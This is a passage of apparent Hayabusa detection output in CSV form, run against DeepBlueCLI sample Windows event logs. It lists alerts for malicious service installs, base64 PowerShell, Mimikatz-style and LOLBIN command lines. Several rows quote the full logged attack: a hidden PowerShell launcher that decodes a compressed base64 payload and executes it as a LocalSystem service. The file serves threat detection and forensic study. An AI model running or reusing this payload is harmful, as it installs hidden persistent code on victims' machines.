IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:38:04.034 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:38:04.034 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.659 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 